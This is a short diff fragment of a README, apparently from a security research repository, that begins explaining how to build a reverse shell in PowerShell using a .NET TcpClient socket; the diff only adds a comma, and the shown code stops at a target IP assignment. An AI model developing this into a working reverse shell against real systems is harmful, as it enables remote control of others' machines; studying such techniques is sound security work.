buzzer-re/mresearch/Windows/reverse_powershell/README.md

 We need create each of this steps in Powershell scripting, so let's begin.

-To make a connection in some host, we will need create a socket, a TCP socket exactly and this is available in .Net namespaces, more precisely in ***[System.Net.Sockets.TcpClient]***.
+To make a connection in some host, we will need create a socket, a TCP socket exactly, and this is available in .Net namespaces, more precisely in ***[System.Net.Sockets.TcpClient]***.

 ```powershell
 $target = "172.16.110.129"